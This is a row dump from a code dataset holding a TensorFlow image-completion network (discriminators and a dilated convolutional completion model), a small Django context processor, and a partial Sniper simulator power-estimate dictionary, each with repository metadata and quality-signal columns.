hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c58128e091966d79215bd05f0ec4a93da48c660b | 8,190 | py | Python | ic_fcn/models.py | VitaliKaiser/TF-Image-Completion-FCN | 1d646a0147fb22d7b788c212a92b3ad8ebab2e8c | [
"MIT"
] | null | null | null | ic_fcn/models.py | VitaliKaiser/TF-Image-Completion-FCN | 1d646a0147fb22d7b788c212a92b3ad8ebab2e8c | [
"MIT"
] | null | null | null | ic_fcn/models.py | VitaliKaiser/TF-Image-Completion-FCN | 1d646a0147fb22d7b788c212a92b3ad8ebab2e8c | [
"MIT"
] | null | null | null | import tensorflow as tf
def build_local_discriminator(input_features):
last_layer = input_features
with tf.name_scope("discriminator_local"):
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=64,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=128,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=512,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=512,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.batch_normalization(inputs=last_layer)
flat = tf.contrib.layers.flatten(last_layer)
logits = tf.contrib.layers.fully_connected(inputs=flat, num_outputs=1024)
return logits
def build_global_discriminator(input_features):
last_layer = input_features
with tf.name_scope("discriminator_global"):
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=64,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=128,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=512,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=512,
kernel_size=[5, 5],
strides=(2, 2))
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=512,
kernel_size=[5, 5],
strides=(2, 2))
flat = tf.contrib.layers.flatten(last_layer)
logits = tf.contrib.layers.fully_connected(inputs=flat, num_outputs=1024)
return logits
def build_completion_fcn(input_features):
last_layer = input_features
with tf.name_scope("completion_fcn"):
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=64,
kernel_size=[5, 5],
strides=(1, 1),
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
###################################################
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=128,
kernel_size=[3, 3], ###
strides=(2, 2),
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=128,
kernel_size=[3, 3],
strides=(1, 1), ###
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
###################################################
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(2, 2), ####
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1), ###
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(2, 2), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(4, 4), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(8, 8), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(16, 16), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(1, 1), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=256,
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
###################################################
last_layer = tf.layers.conv2d_transpose(inputs=last_layer, ###
filters=128,
kernel_size=[4, 4], ###
strides=(2, 2), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer, ###
filters=256,
kernel_size=[3, 3], ###
strides=(1, 1), ###
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
###################################################
last_layer = tf.layers.conv2d_transpose(inputs=last_layer, ###
filters=64, ###
kernel_size=[4, 4], ###
strides=(2, 2), ###
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer, ###
filters=32, ###
kernel_size=[3, 3], ###
strides=(1, 1), ###
dilation_rate=(1, 1),
activation=tf.nn.relu,
padding='same')
last_layer = tf.layers.batch_normalization(inputs=last_layer)
last_layer = tf.layers.conv2d(inputs=last_layer,
filters=3, ###
kernel_size=[3, 3],
strides=(1, 1),
dilation_rate=(1, 1),
activation=None, ###
padding='same')
return last_layer | 33.428571 | 81 | 0.538095 | 922 | 8,190 | 4.571584 | 0.062907 | 0.222064 | 0.127877 | 0.197628 | 0.972242 | 0.972242 | 0.972242 | 0.971056 | 0.971056 | 0.971056 | 0 | 0.046008 | 0.317949 | 8,190 | 245 | 82 | 33.428571 | 0.708557 | 0 | 0 | 0.924623 | 0 | 0 | 0.015295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015075 | false | 0 | 0.005025 | 0 | 0.035176 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
c59d5de1a49296c101f04d41c107d6b5ddc1166c | 140 | py | Python | job_board/context_processors.py | koobs/tramcar | 32c97379d04b78a471e4701a01d95fd4b83f93e9 | [
"MIT"
] | null | null | null | job_board/context_processors.py | koobs/tramcar | 32c97379d04b78a471e4701a01d95fd4b83f93e9 | [
"MIT"
] | null | null | null | job_board/context_processors.py | koobs/tramcar | 32c97379d04b78a471e4701a01d95fd4b83f93e9 | [
"MIT"
] | null | null | null | from django.contrib.sites.shortcuts import get_current_site
def get_site(request):
return {'current_site': get_current_site(request)}
| 23.333333 | 59 | 0.8 | 20 | 140 | 5.3 | 0.6 | 0.311321 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 140 | 5 | 60 | 28 | 0.848 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
c5e09e2572825b8b9257bf8db14af8b3f456f438 | 68,506 | py | Python | files/runs_small/cores_4/cholesky/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | 1 | 2021-03-08T03:39:23.000Z | 2021-03-08T03:39:23.000Z | files/runs_small/cores_4/cholesky/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | files/runs_small/cores_4/cholesky/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | power = {'BUSES': {'Area': 1.3377,
'Bus/Area': 1.3377,
'Bus/Gate Leakage': 0.00666015,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0694515,
'Bus/Subthreshold Leakage with power gating': 0.0260443,
'Gate Leakage': 0.00666015,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0694515,
'Subthreshold Leakage with power gating': 0.0260443},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.390141,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.509122,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.11028,
'Execution Unit/Floating Point Units/Runtime Dynamic': 1.23238,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.845125,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.46345,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.879494,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 3.18807,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.511835,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.578485,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.69075,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.398677,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0306365,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.367464,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.226575,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.766141,
'Execution Unit/Register Files/Runtime Dynamic': 0.257212,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.994827,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 2.07122,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.83648,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00249165,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00249165,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00215934,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000829966,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00325477,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0103974,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0242784,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.217813,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.461588,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.73979,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.45387,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0529949,
'L2/Runtime Dynamic': 0.0118225,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.82933,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.69515,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.180921,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.180921,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.68716,
'Load Store Unit/Runtime Dynamic': 3.76832,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.446121,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.892242,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.15833,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.159106,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0753769,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.832215,
'Memory Management Unit/Runtime Dynamic': 0.234483,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 31.7936,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.39089,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0599521,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.409483,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.86033,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 15.1653,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.376948,
